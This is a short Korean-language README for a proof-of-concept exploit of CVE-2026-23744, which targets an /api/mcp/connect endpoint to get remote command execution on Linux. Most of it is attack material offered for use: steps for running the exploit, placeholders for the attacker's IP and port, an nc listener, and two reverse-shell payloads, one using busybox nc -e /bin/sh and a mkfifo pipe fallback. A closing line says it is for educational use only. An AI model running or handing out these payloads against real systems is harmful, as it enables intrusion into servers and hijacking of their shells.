
# CVE-2026-23744 개념 증명 익스플로잇 /api/mcp/connect를 대상으로 하여 Linux 시스템에서 리버스 셸을 통한 원격 명령 실행을 달성하는 개념 증명 익스플로잇입니다.
/api/mcp/connect를 악용하여 원격 명령 실행을 수행하는 PoC입니다.
pip install requests
python3 exploit.py <대상>
예시:
python3 exploit.py mcp.something.com
attacker_ip = "YOUR_IP"
port = 4444
nc -lvnp 4444
기본:
busybox nc <IP> <PORT> -e /bin/sh
대체:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | busybox nc <IP> <PORT> > /tmp/f
-e가 실패하면 대체 페이로드를 사용하세요교육 목적으로만 사용하세요.